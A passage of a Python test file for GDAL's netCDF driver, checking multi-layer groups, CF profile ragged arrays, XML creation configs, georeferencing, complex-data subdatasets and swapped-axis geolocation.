for ilayer in range(2):
ds = ogr.Open('tmp/netcdf_57/lyr%d.nc' % ilayer)
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
assert f['lyr_id'] == ilayer
ds = None
shutil.rmtree('tmp/netcdf_57')
###############################################################################
# Test one layer per group (NC4)
def test_netcdf_58():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_58.nc', options=['FORMAT=NC4', 'MULTIPLE_LAYERS=SEPARATE_GROUPS', 'GEOMETRY_ENCODING=WKT'])
for ilayer in range(2):
# Make sure auto-grow will happen, to check that it works well with multiple groups
lyr = ds.CreateLayer('lyr%d' % ilayer, geom_type=ogr.wkbNone, options=['USE_STRING_IN_NC4=NO', 'STRING_DEFAULT_WIDTH=1'])
lyr.CreateField(ogr.FieldDefn('lyr_id', ogr.OFTString))
f = ogr.Feature(lyr.GetLayerDefn())
f['lyr_id'] = 'lyr_%d' % ilayer
lyr.CreateFeature(f)
ds = None
ds = ogr.Open('tmp/netcdf_58.nc')
for ilayer in range(2):
lyr = ds.GetLayer(ilayer)
f = lyr.GetNextFeature()
assert f['lyr_id'] == 'lyr_%d' % ilayer
ds = None
gdal.Unlink('tmp/netcdf_58.nc')
###############################################################################
# check for UnitType set/get.
def test_netcdf_59():
if gdaltest.netcdf_drv is None:
pytest.skip()
# get
ds = gdal.Open('data/unittype.nc')
unit = ds.GetRasterBand(1).GetUnitType()
assert unit == 'm/s', ('Incorrect unit(%s)' % unit)
ds = None
# set
tst = gdaltest.GDALTest('NetCDF', 'unittype.nc', 1, 4672)
return tst.testSetUnitType()
###############################################################################
# Test reading a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# http://cfconventions.org/cf-conventions/v1.6.0/cf-conventions.html#_indexed_ragged_array_representation_of_profiles
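# For reference, a minimal CDL sketch of what such a layout looks like
# (illustrative only; this is not the exact content of data/profile.nc):
#   dimensions:
#       profile = 2 ;
#       record = UNLIMITED ;
#   variables:
#       int profile(profile) ;
#           profile:cf_role = "profile_id" ;
#       int parentIndex(record) ;
#           parentIndex:instance_dimension = "profile" ;
#   // global attributes:
#           :featureType = "profile" ;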
def test_netcdf_60():
if gdaltest.netcdf_drv is None:
pytest.skip()
# Test that a vector cannot be opened in raster-only mode
ds = gdal.OpenEx('data/profile.nc', gdal.OF_RASTER)
assert ds is None
ds = gdal.OpenEx('data/profile.nc', gdal.OF_VECTOR)
assert ds is not None
with gdaltest.error_handler():
gdal.VectorTranslate('/vsimem/netcdf_60.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_60.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_60.csv')
###############################################################################
# Test appending to a "Indexed ragged array representation of profiles" v1.6.0 H3.5
def test_netcdf_61():
if gdaltest.netcdf_drv is None:
pytest.skip()
shutil.copy('data/profile.nc', 'tmp/netcdf_61.nc')
ds = gdal.VectorTranslate('tmp/netcdf_61.nc', 'data/profile.nc', accessMode='append')
gdal.VectorTranslate('/vsimem/netcdf_61.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_61.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_61.csv')
gdal.Unlink('/vsimem/netcdf_61.nc')
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
def test_netcdf_62():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.VectorTranslate('tmp/netcdf_62.nc', 'data/profile.nc', format='netCDF', layerCreationOptions=['FEATURE_TYPE=PROFILE', 'PROFILE_DIM_INIT_SIZE=1',
'PROFILE_VARIABLES=station'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
gdal.VectorTranslate('/vsimem/netcdf_62.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_62.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_62.csv')
def test_netcdf_62_ncdump_check():
if gdaltest.netcdf_drv is None:
pytest.skip()
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except OSError:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h tmp/netcdf_62.nc')
assert ('profile = 2' in ret and \
'record = UNLIMITED' in ret and \
'profile:cf_role = "profile_id"' in ret and \
'parentIndex:instance_dimension = "profile"' in ret and \
':featureType = "profile"' in ret and \
'char station(profile' in ret and \
'char foo(record' in ret)
else:
pytest.skip()
def test_netcdf_62_cf_check():
if gdaltest.netcdf_drv is None:
pytest.skip()
import netcdf_cf
netcdf_cf.netcdf_cf_setup()
if gdaltest.netcdf_cf_method is not None:
netcdf_cf.netcdf_cf_check_file('tmp/netcdf_62.nc', 'auto', False)
gdal.Unlink('/vsimem/netcdf_62.nc')
###############################################################################
# Test creating a NC4 "Indexed ragged array representation of profiles" v1.6.0 H3.5
def test_netcdf_63():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
shutil.copy('data/profile.nc', 'tmp/netcdf_63.nc')
ds = gdal.VectorTranslate('tmp/netcdf_63.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['FORMAT=NC4', 'GEOMETRY_ENCODING=WKT'],
layerCreationOptions=['FEATURE_TYPE=PROFILE', \
'USE_STRING_IN_NC4=NO', 'STRING_DEFAULT_WIDTH=1'])
gdal.VectorTranslate('/vsimem/netcdf_63.csv', ds, format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_63.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_63.csv')
def test_netcdf_63_ncdump_check():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except OSError:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h tmp/netcdf_63.nc')
assert ('profile = UNLIMITED' in ret and \
'record = UNLIMITED' in ret and \
'profile:cf_role = "profile_id"' in ret and \
'parentIndex:instance_dimension = "profile"' in ret and \
':featureType = "profile"' in ret and \
'char station(record' in ret)
else:
gdal.Unlink('/vsimem/netcdf_63.nc')
pytest.skip()
gdal.Unlink('/vsimem/netcdf_63.nc')
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# but without a profile field.
def test_netcdf_64():
if gdaltest.netcdf_drv is None:
pytest.skip()
gdal.VectorTranslate('tmp/netcdf_64.nc', 'data/profile.nc', format='netCDF', selectFields=['id,station,foo'], layerCreationOptions=['FEATURE_TYPE=PROFILE',
'PROFILE_DIM_NAME=profile_dim', 'PROFILE_DIM_INIT_SIZE=1', 'LEGACY=WKT'], datasetCreationOptions=['GEOMETRY_ENCODING=WKT'])
gdal.VectorTranslate('/vsimem/netcdf_64.csv', 'tmp/netcdf_64.nc', format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_64.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile_dim,id,station,foo
"POINT Z (2 49 100)",0,1,Palo Alto,bar
"POINT Z (3 50 50)",1,2,Santa Fe,baz
"POINT Z (2 49 200)",0,3,Palo Alto,baw
"POINT Z (3 50 100)",1,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_64.csv')
gdal.Unlink('/vsimem/netcdf_64.nc')
###############################################################################
# Test creating an NC4 file with empty string fields / WKT fields
# (they must be filled as empty strings to avoid crashes in netcdf lib)
def test_netcdf_65():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = ogr.GetDriverByName('netCDF').CreateDataSource('tmp/netcdf_65.nc', options=['FORMAT=NC4', 'GEOMETRY_ENCODING=WKT'])
lyr = ds.CreateLayer('test')
lyr.CreateField(ogr.FieldDefn('str', ogr.OFTString))
f = ogr.Feature(lyr.GetLayerDefn())
lyr.CreateFeature(f)
ds = None
ds = ogr.Open('tmp/netcdf_65.nc')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f['str'] != '':
f.DumpReadable()
pytest.fail()
ds = None
gdal.Unlink('tmp/netcdf_65.nc')
###############################################################################
# Test creating a "Indexed ragged array representation of profiles" v1.6.0 H3.5
# from a config file
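# (As exercised below, the CONFIG_FILE dataset creation option accepts either a
#  path to an XML file or the XML content itself passed inline.)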
def test_netcdf_66():
if gdaltest.netcdf_drv is None:
pytest.skip()
# First try with some not-so-good configurations
with gdaltest.error_handler():
gdal.VectorTranslate('tmp/netcdf_66.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['CONFIG_FILE=not_existing'])
with gdaltest.error_handler():
gdal.VectorTranslate('tmp/netcdf_66.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['CONFIG_FILE=<Configuration>'])
myconfig = \
"""<Configuration>
<!-- comment -->
<unrecognized_elt/>
<DatasetCreationOption/>
<DatasetCreationOption name="x"/>
<DatasetCreationOption value="x"/>
<LayerCreationOption/>
<LayerCreationOption name="x"/>
<LayerCreationOption value="x"/>
<Attribute/>
<Attribute name="foo"/>
<Attribute value="foo"/>
<Attribute name="foo" value="bar" type="unsupported"/>
<Field/>
<Field name="x">
<!-- comment -->
<unrecognized_elt/>
</Field>
<Field name="station" main_dim="non_existing"/>
<Layer/>
<Layer name="x">
<!-- comment -->
<unrecognized_elt/>
<LayerCreationOption/>
<LayerCreationOption name="x"/>
<LayerCreationOption value="x"/>
<Attribute/>
<Attribute name="foo"/>
<Attribute value="foo"/>
<Attribute name="foo" value="bar" type="unsupported"/>
<Field/>
</Layer>
</Configuration>
"""
with gdaltest.error_handler():
gdal.VectorTranslate('tmp/netcdf_66.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['CONFIG_FILE=' + myconfig, 'GEOMETRY_ENCODING=WKT'])
# Now with a correct configuration
myconfig = \
"""<Configuration>
<DatasetCreationOption name="WRITE_GDAL_TAGS" value="NO"/>
<LayerCreationOption name="STRING_DEFAULT_WIDTH" value="1"/>
<Attribute name="foo" value="bar"/>
<Attribute name="foo2" value="bar2"/>
<Field name="id">
<Attribute name="my_extra_attribute" value="5.23" type="double"/>
</Field>
<Field netcdf_name="lon"> <!-- edit predefined variable -->
<Attribute name="my_extra_lon_attribute" value="foo"/>
</Field>
<Layer name="profile" netcdf_name="my_profile">
<LayerCreationOption name="FEATURE_TYPE" value="PROFILE"/>
<LayerCreationOption name="RECORD_DIM_NAME" value="obs"/>
<Attribute name="foo" value="123" type="integer"/> <!-- override global one -->
<Field name="station" netcdf_name="my_station" main_dim="obs">
<Attribute name="long_name" value="my station attribute"/>
</Field>
<Field netcdf_name="lat"> <!-- edit predefined variable -->
<Attribute name="long_name" value=""/> <!-- remove predefined attribute -->
</Field>
</Layer>
</Configuration>
"""
gdal.VectorTranslate('tmp/netcdf_66.nc', 'data/profile.nc', format='netCDF', datasetCreationOptions=['CONFIG_FILE=' + myconfig, 'GEOMETRY_ENCODING=WKT'])
gdal.VectorTranslate('/vsimem/netcdf_66.csv', 'tmp/netcdf_66.nc', format='CSV', layerCreationOptions=['LINEFORMAT=LF', 'GEOMETRY=AS_WKT', 'STRING_QUOTING=IF_NEEDED'])
fp = gdal.VSIFOpenL('/vsimem/netcdf_66.csv', 'rb')
if fp is not None:
content = gdal.VSIFReadL(1, 10000, fp).decode('ascii')
gdal.VSIFCloseL(fp)
expected_content = """WKT,profile,id,my_station,foo
"POINT Z (2 49 100)",1,1,Palo Alto,bar
"POINT Z (3 50 50)",2,2,Santa Fe,baz
"POINT Z (2 49 200)",1,3,Palo Alto,baw
"POINT Z (3 50 100)",2,4,Santa Fe,baz2
"""
assert content == expected_content
gdal.Unlink('/vsimem/netcdf_66.csv')
def test_netcdf_66_ncdump_check():
if gdaltest.netcdf_drv is None:
pytest.skip()
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except OSError:
err = None
if err is not None and 'netcdf library version' in err:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h tmp/netcdf_66.nc')
assert ('char my_station(obs, my_station_max_width)' in ret and \
'my_station:long_name = "my station attribute"' in ret and \
'lon:my_extra_lon_attribute = "foo"' in ret and \
'lat:long_name' not in ret and \
'id:my_extra_attribute = 5.23' in ret and \
'profile:cf_role = "profile_id"' in ret and \
'parentIndex:instance_dimension = "profile"' in ret and \
':featureType = "profile"' in ret)
else:
gdal.Unlink('/vsimem/netcdf_66.nc')
pytest.skip()
gdal.Unlink('/vsimem/netcdf_66.nc')
###############################################################################
# ticket #5950: optimize IReadBlock() and CheckData() handling of partial
# blocks in the x axis. Check for partial block reading.
def test_netcdf_67():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
try:
import numpy
except ImportError:
pytest.skip()
# disable bottom-up mode to use the real file's block size
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', 'NO')
# for the moment the next test using check_stat does not work; it seems
# the last pixel (9) of the image is not handled by stats...
# tst = gdaltest.GDALTest( 'NetCDF', 'partial_block_ticket5950.nc', 1, 45 )
# result = tst.testOpen( check_stat=(1, 9, 5, 2.582) )
# so for the moment compare the full image
ds = gdal.Open('data/partial_block_ticket5950.nc', gdal.GA_ReadOnly)
ref = numpy.arange(1, 10).reshape((3, 3))
if not numpy.array_equal(ds.GetRasterBand(1).ReadAsArray(), ref):
pytest.fail()
ds = None
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', None)
###############################################################################
# Test reading SRS from srid attribute (#6613)
def test_netcdf_68():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/srid.nc')
wkt = ds.GetProjectionRef()
assert '6933' in wkt
###############################################################################
# Test opening a dataset with a 1D variable with 0 record (#6645)
def test_netcdf_69():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/test6645.nc')
assert ds is not None
###############################################################################
# Test that we don't erroneously identify non-longitude axis as longitude (#6759)
def test_netcdf_70():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/test6759.nc')
gt = ds.GetGeoTransform()
expected_gt = [304250.0, 250.0, 0.0, 4952500.0, 0.0, -250.0]
assert max(abs(gt[i] - expected_gt[i]) for i in range(6)) <= 1e-3
###############################################################################
# Test that we take into account x and y offset and scaling
# (https://github.com/OSGeo/gdal/pull/200)
def test_netcdf_71():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/test_coord_scale_offset.nc')
gt = ds.GetGeoTransform()
expected_gt = (-690769.999174516, 1015.8812500000931, 0.0, 2040932.1838741193, 0.0, 1015.8812499996275)
assert max(abs(gt[i] - expected_gt[i]) for i in range(6)) <= 1e-3
###############################################################################
# test int64 attributes / dim
def test_netcdf_72():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ds = gdal.Open('data/int64dim.nc')
mdi = ds.GetRasterBand(1).GetMetadataItem('NETCDF_DIM_TIME')
assert mdi == '123456789012'
###############################################################################
# test geostationary with radian units (https://github.com/OSGeo/gdal/pull/220)
def test_netcdf_73():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/geos_rad.nc')
gt = ds.GetGeoTransform()
expected_gt = (-5979486.362104082, 1087179.4077774752, 0.0, -5979487.123448145, 0.0, 1087179.4077774752)
assert max([abs(gt[i] - expected_gt[i]) for i in range(6)]) <= 1
###############################################################################
# test geostationary with microradian units (https://github.com/OSGeo/gdal/pull/220)
def test_netcdf_74():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/geos_microradian.nc')
gt = ds.GetGeoTransform()
expected_gt = (-5739675.119757546, 615630.8078590936, 0.0, -1032263.7666924844, 0.0, 615630.8078590936)
assert max([abs(gt[i] - expected_gt[i]) for i in range(6)]) <= 1
###############################################################################
# test opening an ncdump file
def test_netcdf_75():
if gdaltest.netcdf_drv is None:
pytest.skip()
if gdaltest.netcdf_drv.GetMetadataItem("ENABLE_NCDUMP") != 'YES':
pytest.skip()
tst = gdaltest.GDALTest('NetCDF', 'byte.nc.txt',
1, 4672)
wkt = """PROJCS["NAD27 / UTM zone 11N",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4267"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",-117],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AUTHORITY["EPSG","26711"]]"""
return tst.testOpen(check_prj=wkt)
###############################################################################
# test opening a vector ncdump file
def test_netcdf_76():
if gdaltest.netcdf_drv is None:
pytest.skip()
if gdaltest.netcdf_drv.GetMetadataItem("ENABLE_NCDUMP") != 'YES':
pytest.skip()
ds = ogr.Open('data/poly.nc.txt')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
if f is None or f.GetGeometryRef() is None:
f.DumpReadable()
pytest.fail()
###############################################################################
# test opening a raster file that used to be confused with a vector file (#6974)
def test_netcdf_77():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/fake_Oa01_radiance.nc')
subdatasets = ds.GetMetadata('SUBDATASETS')
assert len(subdatasets) == 2 * 2
ds = gdal.Open('NETCDF:"data/fake_Oa01_radiance.nc":Oa01_radiance')
assert not ds.GetMetadata('GEOLOCATION')
###############################################################################
# test that we correctly handle valid_range={0,255} for a byte dataset with a
# negative nodata value
def test_netcdf_78():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/byte_with_valid_range.nc')
assert ds.GetRasterBand(1).GetNoDataValue() == 240
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('B' * 4, data)
assert data == (128, 129, 126, 127)
###############################################################################
# test that we correctly handle _Unsigned="true" for a byte dataset with a
# negative nodata value
def test_netcdf_79():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/byte_with_neg_fillvalue_and_unsigned_hint.nc')
assert ds.GetRasterBand(1).GetNoDataValue() == 240
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('B' * 4, data)
assert data == (128, 129, 126, 127)
###############################################################################
# Test creating and opening a file whose name contains an accented character
def test_netcdf_80():
if gdaltest.netcdf_drv is None:
pytest.skip()
test = gdaltest.GDALTest('NETCDF', '../data/byte.tif', 1, 4672)
return test.testCreateCopy(new_filename='test\xc3\xa9.nc', check_gt=0, check_srs=0, check_minmax=0)
###############################################################################
# netCDF file in rotated_pole projection
def test_netcdf_81():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/rotated_pole.nc')
assert ds.RasterXSize == 137 and ds.RasterYSize == 108, \
'Did not get expected dimensions'
projection = ds.GetProjectionRef()
expected_projection = """PROJCS["unnamed",GEOGCS["unknown",DATUM["unnamed",SPHEROID["Spheroid",6367470,594.313048347956]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]]],PROJECTION["Rotated_pole"],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],EXTENSION["PROJ4","+proj=ob_tran +o_proj=longlat +lon_0=18 +o_lon_p=0 +o_lat_p=39.25 +a=6367470 +b=6367470 +to_meter=0.0174532925199 +wktext"]]"""
assert projection == expected_projection, 'Did not get expected projection'
gt = ds.GetGeoTransform()
expected_gt = (-35.47, 0.44, 0.0, 23.65, 0.0, -0.44)
assert max([abs(gt[i] - expected_gt[i]) for i in range(6)]) <= 1e-3, \
'Did not get expected geotransform'
###############################################################################
# netCDF file with extra dimensions that are oddly indexed (1D variable
# corresponding to the dimension but with a different name, no corresponding
# 1D variable, several corresponding variables)
def test_netcdf_82():
if gdaltest.netcdf_drv is None:
pytest.skip()
with gdaltest.error_handler():
ds = gdal.Open('data/oddly_indexed_extra_dims.nc')
md = ds.GetMetadata()
expected_md = {
'NETCDF_DIM_extra_dim_with_var_of_different_name_VALUES': '{100,200}',
'NETCDF_DIM_EXTRA': '{extra_dim_with_several_variables,extra_dim_without_variable,extra_dim_with_var_of_different_name}',
'x#standard_name': 'projection_x_coordinate',
'NC_GLOBAL#Conventions': 'CF-1.5',
'y#standard_name': 'projection_y_coordinate',
'NETCDF_DIM_extra_dim_with_var_of_different_name_DEF': '{2,6}'
}
assert md == expected_md, 'Did not get expected metadata'
md = ds.GetRasterBand(1).GetMetadata()
expected_md = {
'NETCDF_DIM_extra_dim_with_several_variables': '1',
'NETCDF_DIM_extra_dim_with_var_of_different_name': '100',
'NETCDF_DIM_extra_dim_without_variable': '1',
'NETCDF_VARNAME': 'data'
}
assert md == expected_md, 'Did not get expected metadata'
###############################################################################
# Test complex data subsets
def test_netcdf_83():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/complex.nc')
sds_list = ds.GetMetadata('SUBDATASETS')
assert len(sds_list) == 6, 'Did not get expected complex subdataset count.'
assert sds_list['SUBDATASET_1_NAME'] == 'NETCDF:"data/complex.nc":f32' and sds_list['SUBDATASET_2_NAME'] == 'NETCDF:"data/complex.nc":f64' and sds_list['SUBDATASET_3_NAME'] == 'NETCDF:"data/complex.nc":/group/fmul', \
'did not get expected subdatasets.'
ds = None
assert not gdaltest.is_file_open('data/complex.nc'), 'file still opened.'
###############################################################################
# Confirm complex subset data access and checksum
# Start with Float32
def test_netcdf_84():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:"data/complex.nc":f32')
assert ds.GetRasterBand(1).DataType == gdal.GDT_CFloat32
cs = ds.GetRasterBand(1).Checksum()
assert cs == 523, 'did not get expected checksum'
# Repeat for Float64
def test_netcdf_85():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:"data/complex.nc":f64')
assert ds.GetRasterBand(1).DataType == gdal.GDT_CFloat64
cs = ds.GetRasterBand(1).Checksum()
assert cs == 511, 'did not get expected checksum'
# Check for groups support
def test_netcdf_86():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:"data/complex.nc":/group/fmul')
assert ds.GetRasterBand(1).DataType == gdal.GDT_CFloat32
cs = ds.GetRasterBand(1).Checksum()
assert cs == 453, 'did not get expected checksum for band 1'
cs = ds.GetRasterBand(2).Checksum()
assert cs == 629, 'did not get expected checksum for band 2'
cs = ds.GetRasterBand(3).Checksum()
assert cs == 473, 'did not get expected checksum for band 3'
###############################################################################
def test_netcdf_uffd():
if gdaltest.netcdf_drv is None:
pytest.skip()
if uffd_compare('orog_CRCM1.nc') is None:
pytest.skip()
netcdf_files = [
'orog_CRCM1.nc',
'orog_CRCM2.nc',
'cf-bug636.nc',
'bug636.nc',
'rotated_pole.nc',
'reduce-cgcms.nc'
]
for netcdf_file in netcdf_files:
assert uffd_compare(netcdf_file) is True
###############################################################################
# netCDF file containing both rasters and vectors
def test_netcdf_mixed_raster_vector():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:data/nc_mixed_raster_vector.nc:Band1')
assert ds.GetRasterBand(1).Checksum() == 4672
ds = ogr.Open('data/nc_mixed_raster_vector.nc')
lyr = ds.GetLayer(0)
f = lyr.GetNextFeature()
assert f['PRFEDEA'] == '35043411'
###############################################################################
# Test opening a file with an empty double attribute
# https://github.com/OSGeo/gdal/issues/1303
def test_netcdf_open_empty_double_attr():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/empty_double_attr.nc')
assert ds
###############################################################################
# Test writing and reading a file with huge block size
def test_netcdf_huge_block_size():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.run_slow_tests():
pytest.skip()
if sys.maxsize < 2**32:
pytest.skip('Test not available on 32 bit')
import psutil
if psutil.virtual_memory().available < 2 * 50000 * 50000:
pytest.skip("Not enough virtual memory available")
tmpfilename = 'tmp/test_netcdf_huge_block_size.nc'
with gdaltest.SetCacheMax(50000 * 50000 + 100000):
with gdaltest.config_option('BLOCKYSIZE', '50000'):
gdal.Translate(tmpfilename,
'../gcore/data/byte.tif',
options='-f netCDF -outsize 50000 50000 -co WRITE_BOTTOMUP=NO -co COMPRESS=DEFLATE -co FORMAT=NC4')
ds = gdal.Open(tmpfilename)
data = ds.ReadRaster(0, 0, ds.RasterXSize, ds.RasterYSize, buf_xsize = 20, buf_ysize = 20)
assert data
ref_ds = gdal.Open('../gcore/data/byte.tif')
assert data == ref_ds.ReadRaster()
ds = None
gdal.Unlink(tmpfilename)
###############################################################################
# Test reading a netCDF file whose fastest varying dimension is Latitude, and
# slowest one is Longitude
# https://lists.osgeo.org/pipermail/gdal-dev/2019-March/049931.html
# Currently we expose it in a 'raw' way, but make sure that geotransform and
# geoloc arrays reflect the georeferencing correctly
def test_netcdf_swapped_x_y_dimension():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/swapedxy.nc')
assert ds.RasterXSize == 4
assert ds.RasterYSize == 8
assert ds.GetGeoTransform() == (90.0, -45.0, 0, -180, 0.0, 45.0)
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('h' * 4 * 8, data)
    assert data == (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31)
md = ds.GetMetadata('GEOLOCATION')
assert md == {
'LINE_OFFSET': '0',
'X_DATASET': 'NETCDF:"data/swapedxy.nc":Latitude',
'SWAP_XY': 'YES',
'PIXEL_STEP': '1',
'SRS': 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]',
'PIXEL_OFFSET': '0',
'X_BAND': '1',
'LINE_STEP': '1',
'Y_DATASET': 'NETCDF:"data/swapedxy.nc":Longitude',
'Y_BAND': '1'}, md
ds = gdal.Open(md['X_DATASET'])
assert ds.RasterXSize == 4
assert ds.RasterYSize == 1
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('f' * 4, data)
assert data == (67.5, 22.5, -22.5, -67.5)
ds = gdal.Open(md['Y_DATASET'])
assert ds.RasterXSize == 8
assert ds.RasterYSize == 1
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('f' * 8, data)
assert data == (-157.5, -112.5, -67.5, -22.5, 22.5, 67.5, 112.5, 157.5)
ds = gdal.Warp('', 'data/swapedxy.nc', options = '-f MEM -geoloc')
